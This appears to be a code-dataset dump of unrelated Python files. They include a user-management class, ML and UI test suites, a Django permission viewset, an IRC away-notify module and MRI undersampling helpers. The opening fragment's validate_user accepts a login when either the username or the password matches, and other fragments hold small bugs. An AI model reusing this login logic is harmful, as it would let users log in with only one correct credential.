return "User added Successfully!"
return "Ensure that the details are relevant before adding a user!"
def get_users(self):
"""get all users"""
if not users:
return "There are no users registered!"
return users
def get_one_user(self, user_id):
"""fetch a specific user"""
if isinstance(user_id, int) is False:
return "User Id should be a number"
for user in range(len(users)):
if user_id != users[user]["user_id"]:
continue
return users[user]
def validate_user(self, details):
"""validate user details while loging in"""
if not details:
return "Please enter data for registration"
if not users:
return "No registered users"
for user in range(len(users)):
if users[user]['username'] != details["username"] and users[user]['password'] != details["password"]:
continue
return "Login Successful!"
def edit_user_role(self, user_id, role):
"""Admin changes attendant role to admin"""
if not users:
return "No registered users"
if isinstance(user_id, int) is False:
return "User Id should be a number"
for user in range(len(users)):
if user_id != users[user]["user_id"]:
continue
user["role"] = "administrator"
return "Attendant was promoted to admin" | en | 0.702576 | users data structures defining global variables initializing user constructor checks if the user details are relevant before registering #if bool(re.search(r'@', details["email"])) is False: #return "Your email should have an @ in it" registering a new user # global variable # check details for data # check validity of data get all users fetch a specific user validate user details while loging in Admin changes attendant role to admin | 3.960313 | 4 |
tigerforecast/tests/test_tigerforecast_functionality.py | danielsuo/TigerForecast | 1 | 6616806 | """
Run all tests for the TigerForecast framework
"""
import tigerforecast
# test all tigerforecast.* methods
def test_tigerforecast_functionality(show_results=False):
print("\nrunning all tigerforecast functionality tests...\n")
test_help()
test_error()
print("\nall tigerforecast functionality tests passed\n")
# test tigerforecast.help() method
def test_help():
tigerforecast.help()
def test_error():
try:
from tigerforecast.error import Error
raise Error()
except Error:
pass
if __name__ == "__main__":
    test_tigerforecast_functionality(show_results=False)
tests/core/test_ops_pool.py | thirionjl/chains | 2 | 6616807 | import numpy as np
import pytest
from chains.core.ops_pooling import MaxPool
from chains.core.static_shape import StaticShape, Dim
from chains.core.utils_conv import TensorFlowNHWC
def test_valid_shape_and_stride():
pool = MaxPool(stride=2)
m = Dim.unknown()
features = StaticShape(m, 3, 40, 30)
pool.check_incoming_shapes(features)
out_shape = pool.compute_out_shape(features)
assert out_shape == StaticShape(m, 3, 20, 15)
def test_invalid_shape_and_stride():
pool = MaxPool(stride=3)
m = Dim.unknown()
features = StaticShape(m, 3, 40, 30)
with pytest.raises(ValueError) as ex:
pool.check_incoming_shapes(features)
assert str(
ex.value) == "Height (40) should be a multiple of stride 3 but is not"
def test_compute_max_pool():
pool = MaxPool(stride=2)
features = np.arange(2 * 3 * 4 * 4, dtype=np.float32).reshape(2, 3, 4, 4)
pool.check_incoming_shapes(StaticShape.of_tensor(features))
pool.compute(features)
actual = pool.output
assert actual.shape == (2, 3, 2, 2)
e1 = np.array([5, 7, 13, 15, 21, 23, 29, 31, 37, 39, 45, 47]) \
.reshape(3, 2, 2).astype(np.float32)
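    # For an arange(96) input, the max of each 2x2 window is its bottom-right
    # element: 5, 7, 13, 15 in channel 0, with +16 per channel and +48 per sample.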
expected = np.stack([e1, e1 + 48], axis=0)
assert expected.shape == (2, 3, 2, 2)
np.testing.assert_allclose(actual, expected)
d_features, = pool.partials(np.ones(actual.shape))
assert d_features.shape == features.shape
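    # Max-pool routes the incoming gradient to each window's argmax -- the
    # bottom-right position here -- so only those entries receive a 1.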
row1 = [0, 0, 0, 0]
row2 = [0, 1, 0, 1]
channel = np.stack([row1, row2, row1, row2], axis=0)
sample = np.stack([channel, channel, channel], axis=0)
expected_partial = np.stack([sample, sample], axis=0)
np.testing.assert_allclose(d_features, expected_partial)
def test_compute_max_pool_with_other_format():
pool = MaxPool(stride=2, conv_format=TensorFlowNHWC)
features = np.arange(2 * 4 * 4 * 3, dtype=np.float32).reshape(2, 4, 4, 3)
pool.check_incoming_shapes(StaticShape.of_tensor(features))
pool.compute(features)
actual = pool.output
np.testing.assert_allclose(actual, np.array([[[[15., 16., 17.],
[21., 22., 23.]],
[[39., 40., 41.],
[45., 46., 47.]]],
[[[63., 64., 65.],
[69., 70., 71.]],
[[87., 88., 89.],
[93., 94., 95.]]]],
dtype=np.float32))
d_features, = pool.partials(np.ones(actual.shape))
np.testing.assert_allclose(d_features, np.array([[[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]]],
[[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]]]],
dtype=np.float32))
def _sample_pool2d_strided():
import tensorflow as tf
features = tf.Variable(
np.arange(2 * 4 * 4 * 3, dtype=np.float32).reshape(2, 4, 4, 3))
conv = tf.nn.max_pool(value=features, ksize=(1, 2, 2, 1), padding="VALID",
strides=(1, 2, 2, 1))
gd = tf.train.GradientDescentOptimizer(learning_rate=0.1)
grads_and_vars = gd.compute_gradients(conv)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
c = sess.run(conv)
g = sess.run(grads_and_vars)
print("Activations = ", repr(c))
print("dFeatures = ", repr(g[0][0]))
| import numpy as np
import pytest
from chains.core.ops_pooling import MaxPool
from chains.core.static_shape import StaticShape, Dim
from chains.core.utils_conv import TensorFlowNHWC
def test_valid_shape_and_stride():
pool = MaxPool(stride=2)
m = Dim.unknown()
features = StaticShape(m, 3, 40, 30)
pool.check_incoming_shapes(features)
out_shape = pool.compute_out_shape(features)
assert out_shape == StaticShape(m, 3, 20, 15)
def test_invalid_shape_and_stride():
pool = MaxPool(stride=3)
m = Dim.unknown()
features = StaticShape(m, 3, 40, 30)
with pytest.raises(ValueError) as ex:
pool.check_incoming_shapes(features)
assert str(
ex.value) == "Height (40) should be a multiple of stride 3 but is not"
def test_compute_max_pool():
pool = MaxPool(stride=2)
features = np.arange(2 * 3 * 4 * 4, dtype=np.float32).reshape(2, 3, 4, 4)
pool.check_incoming_shapes(StaticShape.of_tensor(features))
pool.compute(features)
actual = pool.output
assert actual.shape == (2, 3, 2, 2)
e1 = np.array([5, 7, 13, 15, 21, 23, 29, 31, 37, 39, 45, 47]) \
.reshape(3, 2, 2).astype(np.float32)
expected = np.stack([e1, e1 + 48], axis=0)
assert expected.shape == (2, 3, 2, 2)
np.testing.assert_allclose(actual, expected)
d_features, = pool.partials(np.ones(actual.shape))
assert d_features.shape == features.shape
row1 = [0, 0, 0, 0]
row2 = [0, 1, 0, 1]
channel = np.stack([row1, row2, row1, row2], axis=0)
sample = np.stack([channel, channel, channel], axis=0)
expected_partial = np.stack([sample, sample], axis=0)
np.testing.assert_allclose(d_features, expected_partial)
def test_compute_max_pool_with_other_format():
pool = MaxPool(stride=2, conv_format=TensorFlowNHWC)
features = np.arange(2 * 4 * 4 * 3, dtype=np.float32).reshape(2, 4, 4, 3)
pool.check_incoming_shapes(StaticShape.of_tensor(features))
pool.compute(features)
actual = pool.output
np.testing.assert_allclose(actual, np.array([[[[15., 16., 17.],
[21., 22., 23.]],
[[39., 40., 41.],
[45., 46., 47.]]],
[[[63., 64., 65.],
[69., 70., 71.]],
[[87., 88., 89.],
[93., 94., 95.]]]],
dtype=np.float32))
d_features, = pool.partials(np.ones(actual.shape))
np.testing.assert_allclose(d_features, np.array([[[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]]],
[[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]]]],
dtype=np.float32))
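# Reference helper (the leading underscore keeps pytest from collecting it):
# it regenerates the expected activations/gradients above using TensorFlow 1.x.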
def _sample_pool2d_strided():
import tensorflow as tf
features = tf.Variable(
np.arange(2 * 4 * 4 * 3, dtype=np.float32).reshape(2, 4, 4, 3))
conv = tf.nn.max_pool(value=features, ksize=(1, 2, 2, 1), padding="VALID",
strides=(1, 2, 2, 1))
gd = tf.train.GradientDescentOptimizer(learning_rate=0.1)
grads_and_vars = gd.compute_gradients(conv)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
c = sess.run(conv)
g = sess.run(grads_and_vars)
print("Activations = ", repr(c))
print("dFeatures = ", repr(g[0][0]))
| none | 1 | 2.294283 | 2 | |
learn-to-code-with-python/18-Dictionaries-Iteration/lists-of-dictionaries.py | MaciejZurek/python_practicing | 0 | 6616808 | <reponame>MaciejZurek/python_practicing
concert_attendees = [
{"name": "Taylor", "section": 400, "price paid": 99.99},
{"name": "Cristina", "section": 200, "price paid": 149.99},
{"name": "Jeremy", "section": 100, "price paid": 0.0}
]
for attendee in concert_attendees:
for key, value in attendee.items():
print(f"The {key} is {value}.")
| concert_attendees = [
{"name": "Taylor", "section": 400, "price paid": 99.99},
{"name": "Cristina", "section": 200, "price paid": 149.99},
{"name": "Jeremy", "section": 100, "price paid": 0.0}
]
for attendee in concert_attendees:
for key, value in attendee.items():
print(f"The {key} is {value}.") | none | 1 | 3.434949 | 3 | |
data/objects/bank.py | vuphan314/justicia | 2 | 6616809 | <reponame>vuphan314/justicia
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from justicia import utils
import os
class Bank():
def __init__(self, verbose = True, config = 0):
self.name = "bank"
self.filename = os.path.dirname(os.path.realpath(__file__)) + "/../raw/bank-additional-full.csv"
if(config == 0):
self.known_sensitive_attributes = ['age', 'marital']
elif(config == 1):
self.known_sensitive_attributes = ['age']
elif(config == 2):
self.known_sensitive_attributes = ['marital']
else:
raise ValueError(str(config)+ " is not a valid configuration for sensitive groups")
self.config = config
self.categorical_attributes = ['job', 'marital', 'education', 'default', 'housing', 'loan', 'contact', 'month', 'day_of_week', 'poutcome', 'y']
self.continuous_attributes = ['age','duration', 'campaign', 'pdays', 'previous', 'emp.var.rate', 'cons.price.idx', 'cons.conf.idx', 'euribor3m', 'nr.employed']
self.verbose = verbose
def get_df(self, repaired = False):
df = pd.read_csv(os.path.dirname(os.path.realpath(__file__)) + "/../raw/bank-additional-full.csv", sep=";")
df.rename(columns={'y':'target'}, inplace=True)
assert len(self.categorical_attributes) + len(self.continuous_attributes) == len(df.columns), "Error in classifying columns:" + str(len(self.categorical_attributes) + len(self.continuous_attributes)) + " " + str(len(df.columns))
# scale
scaler = MinMaxScaler()
df[self.continuous_attributes] = scaler.fit_transform(df[self.continuous_attributes])
self.keep_columns = list(df.columns)
for known_sensitive_attribute in self.known_sensitive_attributes:
if(known_sensitive_attribute in self.continuous_attributes):
df = utils.get_discretized_df(df, columns_to_discretize=[known_sensitive_attribute])
df = utils.get_one_hot_encoded_df(df, [known_sensitive_attribute])
self.continuous_attributes.remove(known_sensitive_attribute)
if(self.verbose):
print("-number of samples: (before dropping nan rows)", len(df))
# drop rows with null values
df = df.dropna()
if(self.verbose):
print("-number of samples: (after dropping nan rows)", len(df))
return df
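# Minimal usage sketch (assumes the raw CSV is present under data/raw/):
#   bank = Bank(verbose=False, config=1)  # config=1 -> sensitive attribute 'age'
#   df = bank.get_df()                    # scaled, encoded, NaN rows dropped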
| import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from justicia import utils
import os
class Bank():
def __init__(self, verbose = True, config = 0):
self.name = "bank"
self.filename = os.path.dirname(os.path.realpath(__file__)) + "/../raw/bank-additional-full.csv"
if(config == 0):
self.known_sensitive_attributes = ['age', 'marital']
elif(config == 1):
self.known_sensitive_attributes = ['age']
elif(config == 2):
self.known_sensitive_attributes = ['marital']
else:
raise ValueError(str(config)+ " is not a valid configuration for sensitive groups")
self.config = config
self.categorical_attributes = ['job', 'marital', 'education', 'default', 'housing', 'loan', 'contact', 'month', 'day_of_week', 'poutcome', 'y']
self.continuous_attributes = ['age','duration', 'campaign', 'pdays', 'previous', 'emp.var.rate', 'cons.price.idx', 'cons.conf.idx', 'euribor3m', 'nr.employed']
self.verbose = verbose
def get_df(self, repaired = False):
df = pd.read_csv(os.path.dirname(os.path.realpath(__file__)) + "/../raw/bank-additional-full.csv", sep=";")
df.rename(columns={'y':'target'}, inplace=True)
assert len(self.categorical_attributes) + len(self.continuous_attributes) == len(df.columns), "Error in classifying columns:" + str(len(self.categorical_attributes) + len(self.continuous_attributes)) + " " + str(len(df.columns))
# scale
scaler = MinMaxScaler()
df[self.continuous_attributes] = scaler.fit_transform(df[self.continuous_attributes])
self.keep_columns = list(df.columns)
for known_sensitive_attribute in self.known_sensitive_attributes:
if(known_sensitive_attribute in self.continuous_attributes):
df = utils.get_discretized_df(df, columns_to_discretize=[known_sensitive_attribute])
df = utils.get_one_hot_encoded_df(df, [known_sensitive_attribute])
self.continuous_attributes.remove(known_sensitive_attribute)
if(self.verbose):
print("-number of samples: (before dropping nan rows)", len(df))
# drop rows with null values
df = df.dropna()
if(self.verbose):
print("-number of samples: (after dropping nan rows)", len(df))
return df | en | 0.258763 | # scale # drop rows with null values | 3.018614 | 3 |
Protheus_WebApp/Modules/SIGAGTP/GTPA422TestCase.py | 98llm/tir-script-samples | 17 | 6616810 | <reponame>98llm/tir-script-samples<filename>Protheus_WebApp/Modules/SIGAGTP/GTPA422TestCase.py
from tir import Webapp
import unittest
import time
class GTPA422(unittest.TestCase):
@classmethod
def setUpClass(inst):
inst.oHelper = Webapp()
inst.oHelper.Setup('SIGAGTP', '27/08/2020', 'T1', 'D MG 01 ', '88')
inst.oHelper.Program('GTPA422')
def test_GTPA422_CT001(self):
print("test_GTPA422_CT001 - Visualizar")
self.oHelper.SearchBrowse('D MG 000003', key=1, index=True)
self.oHelper.SetButton('Visualizar')
self.oHelper.SetButton('Fechar')
self.oHelper.AssertTrue()
def test_GTPA422_CT002(self):
print("test_GTPA422_CT002 - Alterar")
self.oHelper.SearchBrowse('D MG 000003', key=1, index=True)
self.oHelper.SetButton('Alterar')
self.oHelper.SetValue('Motivo', 'Alteração Tir')
self.oHelper.SetButton('Confirmar')
self.oHelper.SetButton('Fechar')
self.oHelper.AssertTrue()
def test_GTPA422_CT003(self):
print("test_GTPA422_CT003 - Excluir")
self.oHelper.SearchBrowse('D MG 000003', key=1, index=True)
self.oHelper.SetButton('Outras Ações', 'Excluir')
self.oHelper.SetButton('Confirmar')
time.sleep(2)
self.oHelper.SetButton('Fechar')
self.oHelper.AssertTrue()
def test_GTPA422_CT004(self):
print("test_GTPA422_CT004 - Incluir")
self.oHelper.SetButton('Incluir')
self.oHelper.SetBranch('D MG')
self.oHelper.SetValue('Tipo', '000001')
self.oHelper.SetValue('Agência', 'GTPVAM')
self.oHelper.F3(field='Serie')
self.oHelper.SearchBrowse('000046', key=1, index=True)
self.oHelper.SetButton('OK')
self.oHelper.SetValue('Seq. Lote', '000012')
self.oHelper.SetValue('Dt. Entrega', '31/08/2020')
self.oHelper.SetValue('Emitente' , '000001')
self.oHelper.SetValue('Cod.Acertado' , '000009')
self.oHelper.SetButton('Outras Ações', 'Carrega Bilhete')
self.oHelper.SetValue('Dt. Emissão de: ?' , '27/08/2020')
self.oHelper.SetValue('Dt Emissão até: ?' , '31/08/2020')
self.oHelper.SetValue('Tipo de Documento: ?' , '000001')
self.oHelper.SetValue('Série: ?' , '422')
self.oHelper.SetValue('Sub Série: ?' , '111')
self.oHelper.SetValue('Num. Complemento: ?' , '111')
self.oHelper.SetValue('Numero Inicial: ?' , '000001')
self.oHelper.SetValue('Numero Final: ?' , '000100')
self.oHelper.SetButton('OK')
time.sleep(3)
self.oHelper.SetButton('Confirmar')
self.oHelper.AssertTrue()
@classmethod
def tearDownClass(inst):
inst.oHelper.TearDown()
if __name__ == '__main__':
unittest.main()
| from tir import Webapp
import unittest
import time
class GTPA422(unittest.TestCase):
@classmethod
def setUpClass(inst):
inst.oHelper = Webapp()
inst.oHelper.Setup('SIGAGTP', '27/08/2020', 'T1', 'D MG 01 ', '88')
inst.oHelper.Program('GTPA422')
def test_GTPA422_CT001(self):
print("test_GTPA422_CT001 - Visualizar")
self.oHelper.SearchBrowse('D MG 000003', key=1, index=True)
self.oHelper.SetButton('Visualizar')
self.oHelper.SetButton('Fechar')
self.oHelper.AssertTrue()
def test_GTPA422_CT002(self):
print("test_GTPA422_CT002 - Alterar")
self.oHelper.SearchBrowse('D MG 000003', key=1, index=True)
self.oHelper.SetButton('Alterar')
self.oHelper.SetValue('Motivo', 'Alteração Tir')
self.oHelper.SetButton('Confirmar')
self.oHelper.SetButton('Fechar')
self.oHelper.AssertTrue()
def test_GTPA422_CT003(self):
print("test_GTPA422_CT003 - Excluir")
self.oHelper.SearchBrowse('D MG 000003', key=1, index=True)
self.oHelper.SetButton('Outras Ações', 'Excluir')
self.oHelper.SetButton('Confirmar')
time.sleep(2)
self.oHelper.SetButton('Fechar')
self.oHelper.AssertTrue()
def test_GTPA422_CT004(self):
print("test_GTPA422_CT004 - Incluir")
self.oHelper.SetButton('Incluir')
self.oHelper.SetBranch('D MG')
self.oHelper.SetValue('Tipo', '000001')
self.oHelper.SetValue('Agência', 'GTPVAM')
self.oHelper.F3(field='Serie')
self.oHelper.SearchBrowse('000046', key=1, index=True)
self.oHelper.SetButton('OK')
self.oHelper.SetValue('Seq. Lote', '000012')
self.oHelper.SetValue('Dt. Entrega', '31/08/2020')
self.oHelper.SetValue('Emitente' , '000001')
self.oHelper.SetValue('Cod.Acertado' , '000009')
self.oHelper.SetButton('Outras Ações', 'Carrega Bilhete')
self.oHelper.SetValue('Dt. Emissão de: ?' , '27/08/2020')
self.oHelper.SetValue('Dt Emissão até: ?' , '31/08/2020')
self.oHelper.SetValue('Tipo de Documento: ?' , '000001')
self.oHelper.SetValue('Série: ?' , '422')
self.oHelper.SetValue('Sub Série: ?' , '111')
self.oHelper.SetValue('Num. Complemento: ?' , '111')
self.oHelper.SetValue('Numero Inicial: ?' , '000001')
self.oHelper.SetValue('Numero Final: ?' , '000100')
self.oHelper.SetButton('OK')
time.sleep(3)
self.oHelper.SetButton('Confirmar')
self.oHelper.AssertTrue()
@classmethod
def tearDownClass(inst):
inst.oHelper.TearDown()
if __name__ == '__main__':
unittest.main() | none | 1 | 2.602334 | 3 | |
core/api/permissions/viewsets.py | geovaniGomes/api_users | 0 | 6616811 | <reponame>geovaniGomes/api_users
from rest_framework.viewsets import ModelViewSet
from rest_framework.response import Response
from rest_framework import status
from core.models import Permission, Group
from .serializers import PermissionSerializer
from django.shortcuts import get_object_or_404
def is_permission(permission, pk=None):
    if pk:
        exist = Permission.objects.filter(code_name=permission['code_name']).exclude(id__in=[pk]).exists()
    else:
        exist = Permission.objects.filter(code_name=permission['code_name']).exists()
    if exist:
        return {"detail": "permission already registered."}
    return {}
def is_group(groups):
for group in groups:
get_object_or_404(Group, name=group['name'], is_deleted=False)
class PermissionViewSet(ModelViewSet):
queryset = Permission.objects.all()
serializer_class = PermissionSerializer
def create(self, request, *args, **kwargs):
if len(request.data) == 0:
response = {
"name": "This field may not be blank.",
"code_name": "This field may not be blank."
}
return Response(response, status=status.HTTP_400_BAD_REQUEST)
permission = request.data
data = is_permission(permission)
if not data:
groups = request.data.get('groups')
if groups is not None and groups != []:
is_group(groups)
serializer = self.serializer_class(data=permission)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
else:
return Response(data, status=status.HTTP_400_BAD_REQUEST)
def update(self, request, *args, **kwargs):
if len(request.data) == 0:
response = {
"name": "This field may not be blank.",
"code_name": "This field may not be blank."
}
return Response(response, status=status.HTTP_400_BAD_REQUEST)
permission = request.data
data = is_permission(permission, kwargs.get('pk'))
if not data:
partial = kwargs.pop('partial', False)
instance = self.get_object()
groups = request.data.get('groups')
if groups is not None and groups != []:
                is_group(groups)  # is_group() only accepts the groups list
serializer = self.serializer_class(instance, data=permission, partial=partial)
serializer.is_valid(raise_exception=True)
self.perform_update(serializer)
return Response(serializer.data)
else:
return Response(data, status=status.HTTP_400_BAD_REQUEST)
def destroy(self, request, *args, **kwargs):
pk = kwargs['pk']
permission = get_object_or_404(Permission, id=pk)
permission.inactivate()
return Response(status=status.HTTP_204_NO_CONTENT)
| from rest_framework.viewsets import ModelViewSet
from rest_framework.response import Response
from rest_framework import status
from core.models import Permission, Group
from .serializers import PermissionSerializer
from django.shortcuts import get_object_or_404
def is_permission(permission, pk=None):
    if pk:
        exist = Permission.objects.filter(code_name=permission['code_name']).exclude(id__in=[pk]).exists()
    else:
        exist = Permission.objects.filter(code_name=permission['code_name']).exists()
    if exist:
        return {"detail": "permission already registered."}
    return {}
def is_group(groups):
for group in groups:
get_object_or_404(Group, name=group['name'], is_deleted=False)
class PermissionViewSet(ModelViewSet):
queryset = Permission.objects.all()
serializer_class = PermissionSerializer
def create(self, request, *args, **kwargs):
if len(request.data) == 0:
response = {
"name": "This field may not be blank.",
"code_name": "This field may not be blank."
}
return Response(response, status=status.HTTP_400_BAD_REQUEST)
permission = request.data
data = is_permission(permission)
if not data:
groups = request.data.get('groups')
if groups is not None and groups != []:
is_group(groups)
serializer = self.serializer_class(data=permission)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
else:
return Response(data, status=status.HTTP_400_BAD_REQUEST)
def update(self, request, *args, **kwargs):
if len(request.data) == 0:
response = {
"name": "This field may not be blank.",
"code_name": "This field may not be blank."
}
return Response(response, status=status.HTTP_400_BAD_REQUEST)
permission = request.data
data = is_permission(permission, kwargs.get('pk'))
if not data:
partial = kwargs.pop('partial', False)
instance = self.get_object()
groups = request.data.get('groups')
if groups is not None and groups != []:
                is_group(groups)  # is_group() only accepts the groups list
serializer = self.serializer_class(instance, data=permission, partial=partial)
serializer.is_valid(raise_exception=True)
self.perform_update(serializer)
return Response(serializer.data)
else:
return Response(data, status=status.HTTP_400_BAD_REQUEST)
def destroy(self, request, *args, **kwargs):
pk = kwargs['pk']
permission = get_object_or_404(Permission, id=pk)
permission.inactivate()
return Response(status=status.HTTP_204_NO_CONTENT) | none | 1 | 2.035597 | 2 | |
txircd/modules/ircv3_away-notify.py | DesertBus/txircd | 4 | 6616812 | <filename>txircd/modules/ircv3_away-notify.py
from txircd.modbase import Module
class AwayNotify(Module):
def capRequest(self, user, capability):
return True
def capAcknowledge(self, user, capability):
return False
def capRequestRemove(self, user, capability):
return True
def capAcknowledgeRemove(self, user, capability):
return False
def capClear(self, user, capability):
return True
def notifyUsers(self, user, namespace, key, oldValue, value):
try:
if not (namespace == "ext" and key == "away"):
return
message = value
if "away" not in user.metadata["ext"]:
message = None
notify = set()
for channel in self.ircd.channels.itervalues():
if user in channel.users:
for u in channel.users.iterkeys():
notify.add(u)
notify.remove(user)
for u in notify:
if "cap" in u.cache and "away-notify" in u.cache["cap"]:
if message is None:
u.sendMessage("AWAY", to=None, prefix=user.prefix())
else:
u.sendMessage("AWAY", ":{}".format(message), to=None, prefix=user.prefix())
        except:
            # Deliberately swallow everything (e.g. notify.remove() raising when
            # the user shares no channel) so a metadata update never crashes.
            pass
def notifyOnJoin(self, user, channel):
if "away" in user.metadata["ext"]:
for u in channel.users.iterkeys():
if u != user and u.server == self.ircd.name and "cap" in u.cache and "away-notify" in u.cache["cap"]:
u.sendMessage("AWAY", ":{}".format(user.metadata["ext"]["away"]), to=None, prefix=user.prefix())
class Spawner(object):
def __init__(self, ircd):
self.ircd = ircd
self.away_notify = None
def spawn(self):
self.away_notify = AwayNotify().hook(self.ircd)
if "cap" not in self.ircd.module_data_cache:
self.ircd.module_data_cache["cap"] = {}
self.ircd.module_data_cache["cap"]["away-notify"] = self.away_notify
return {
"actions": {
"join": self.away_notify.notifyOnJoin,
"metadataupdate": self.away_notify.notifyUsers
}
}
def cleanup(self):
        del self.ircd.module_data_cache["cap"]["away-notify"] | from txircd.modbase import Module
class AwayNotify(Module):
def capRequest(self, user, capability):
return True
def capAcknowledge(self, user, capability):
return False
def capRequestRemove(self, user, capability):
return True
def capAcknowledgeRemove(self, user, capability):
return False
def capClear(self, user, capability):
return True
def notifyUsers(self, user, namespace, key, oldValue, value):
try:
if not (namespace == "ext" and key == "away"):
return
message = value
if "away" not in user.metadata["ext"]:
message = None
notify = set()
for channel in self.ircd.channels.itervalues():
if user in channel.users:
for u in channel.users.iterkeys():
notify.add(u)
notify.remove(user)
for u in notify:
if "cap" in u.cache and "away-notify" in u.cache["cap"]:
if message is None:
u.sendMessage("AWAY", to=None, prefix=user.prefix())
else:
u.sendMessage("AWAY", ":{}".format(message), to=None, prefix=user.prefix())
        except:
            # Deliberately swallow everything (e.g. notify.remove() raising when
            # the user shares no channel) so a metadata update never crashes.
            pass
def notifyOnJoin(self, user, channel):
if "away" in user.metadata["ext"]:
for u in channel.users.iterkeys():
if u != user and u.server == self.ircd.name and "cap" in u.cache and "away-notify" in u.cache["cap"]:
u.sendMessage("AWAY", ":{}".format(user.metadata["ext"]["away"]), to=None, prefix=user.prefix())
class Spawner(object):
def __init__(self, ircd):
self.ircd = ircd
self.away_notify = None
def spawn(self):
self.away_notify = AwayNotify().hook(self.ircd)
if "cap" not in self.ircd.module_data_cache:
self.ircd.module_data_cache["cap"] = {}
self.ircd.module_data_cache["cap"]["away-notify"] = self.away_notify
return {
"actions": {
"join": self.away_notify.notifyOnJoin,
"metadataupdate": self.away_notify.notifyUsers
}
}
def cleanup(self):
del self.ircd.module_data_cache["cap"]["away-notify"] | none | 1 | 2.107269 | 2 | |
tests/test_plot_variant_type_data.py | burkesquires/ombre | 1 | 6616813 | from unittest import TestCase
class TestPlotVariantTypeData(TestCase):
def test_plot_variant_type_data(self):
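        # Placeholder: self.fail() below marks this plotting test as not yet implemented.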
self.fail()
| from unittest import TestCase
class TestPlotVariantTypeData(TestCase):
def test_plot_variant_type_data(self):
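        # Placeholder: self.fail() below marks this plotting test as not yet implemented.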
self.fail()
| none | 1 | 1.899336 | 2 | |
tutorial1_data_driven_reg_methods/utils/helper_funcs.py | ckolbPTB/TES_21_22_Tutorials | 2 | 6616814 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
A collection of auxiliary functions for manipulating data.
"""
import numpy as np
import torch
from numpy.lib.stride_tricks import as_strided
from numpy.fft import ifftshift
import sys
sys.path.append('../')
def random_phase(img):
"""
function for generating a random phase-profile
"""
#get shape of in-plane image
Nx,Ny = img.shape[:2]
x = np.linspace(-np.pi, np.pi, Nx)
y = np.linspace(-np.pi, np.pi, Ny)
#generate parameters to create a random phase profile with values
xx, yy = np.meshgrid(x, y)
a, b,c,d,e = np.random.random(5)
z = a*np.sin(b*xx-c) + (1-a)*np.cos(d*yy-e)
#bring to [-np.pi, np.pi]
z = (np.pi- (-np.pi))*(z-np.min(z))/(np.max(z)-np.min(z)) + (-np.pi)
return z
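# Example: attach a synthetic phase map to a magnitude image
#   img = np.abs(np.random.randn(64, 64))
#   cplx_img = img * np.exp(1j * random_phase(img))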
def cplx_np2torch(x,dim):
"""
    function for converting a complex-valued np.array x
to a complex-valued torch-tensor, where the 2 channels
for the real and imaginary parts are inserted as "dim" dimension
"""
x = torch.stack([torch.tensor(np.real(x)),torch.tensor(np.imag(x))],dim=dim)
return x
def cplx_torch2np(x,dim):
"""
    function for converting a complex-valued torch tensor to a complex-valued numpy array
    the parameter "dim" indicates which dimension is used to store the real
    and the imaginary part in the torch-tensor
    first, the tensor is transposed, such that we can access the real and the imaginary parts
the output is a complex-valued numpy array where the dimension "dim" is dropped
"""
#permutes the axis "dim" and 0
    #now, the 0-th axis contains the real and imaginary parts
x = torch.transpose(x,dim,0)
if x.is_cuda:
x = x.cpu()
    #get the real and imaginary parts
xr = x[0,...].numpy()
xi = x[1,...].numpy()
x = xr+1j*xi
#expand dimensions in order to be able to get back to original shape
x = np.expand_dims(x,axis=0)
x = np.swapaxes(x,0,dim)
#drop the dimension "dim"
x = np.squeeze(x,axis=dim)
return x
def random_mask(img, acc_factor=4):
"""
    function for generating a random binary mask.
For each time point, the mask is different for incoherent undersampling.
"""
def normal_pdf(length, sensitivity):
return np.exp(-sensitivity * (np.arange(length) - length / 2)**2)
def cartesian_mask(shape, acc, sample_n=10):
"""
Sampling density estimated from implementation of kt FOCUSS
shape: tuple - of form (..., nx, ny)
acc: float - doesn't have to be integer 4, 8, etc..
Note:
function borrowed from <NAME> from
https://github.com/js3611/Deep-MRI-Reconstruction/blob/master/utils/compressed_sensing.py
"""
N, Nx, Ny = int(np.prod(shape[:-2])), shape[-2], shape[-1]
pdf_x = normal_pdf(Nx, 0.5/(Nx/10.)**2)
lmda = Nx/(2.*acc)
n_lines = int(Nx / acc)
# add uniform distribution
pdf_x += lmda * 1./Nx
if sample_n:
pdf_x[Nx//2-sample_n//2:Nx//2+sample_n//2] = 0
pdf_x /= np.sum(pdf_x)
n_lines -= sample_n
mask = np.zeros((N, Nx))
for i in range(N):
idx = np.random.choice(Nx, n_lines, False, pdf_x)
mask[i, idx] = 1
if sample_n:
mask[:, Nx//2-sample_n//2:Nx//2+sample_n//2] = 1
size = mask.itemsize
mask = as_strided(mask, (N, Nx, Ny), (size * Nx, size, 0))
mask = mask.reshape(shape)
return mask
